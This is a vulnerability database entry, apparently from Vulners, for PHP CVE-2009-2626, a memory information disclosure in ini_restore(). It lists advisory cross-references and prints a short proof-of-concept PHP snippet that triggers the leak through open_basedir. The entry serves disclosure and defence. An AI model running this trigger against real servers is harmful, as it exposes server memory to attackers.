PHP 5.2.10/5.3 'ini_restore()' Memory Information Disclosur
Reporter | Title | Published | Views | Family All 35 |
---|---|---|---|---|
Cvelist | CVE-2009-2626 | 1 Dec 200916:00 | â | cvelist |
F5 Networks | K13231 : PHP vulnerability CVE-2009-2626 | 9 Sep 201300:00 | â | f5 |
F5 Networks | SOL13231 - PHP vulnerability CVE-2009-2626 | 21 Nov 201100:00 | â | f5 |
Packet Storm | PHP ini_restore Memory Disclosure | 4 Dec 200900:00 | â | packetstorm |
CVE | CVE-2009-2626 | 1 Dec 200916:30 | â | cve |
seebug.org | PHP ini_restore()ĺ ĺ俥ćŻćłé˛ćźć´ | 30 Nov 200900:00 | â | seebug |
UbuntuCve | CVE-2009-2626 | 1 Dec 200900:00 | â | ubuntucve |
RedhatCVE | CVE-2009-2626 | 30 Oct 201510:18 | â | redhatcve |
NVD | CVE-2009-2626 | 1 Dec 200916:30 | â | nvd |
Exploit DB | PHP 5.2.10/5.3.0 - 'ini_restore()' Memory Information Disclosure | 3 Dec 200900:00 | â | exploitdb |
source: https://www.securityfocus.com/bid/36009/info
PHP is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
<?php
ini_set("open_basedir", "A");
ini_restore("open_basedir");
ini_get("open_basedir");
include("B");
?>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo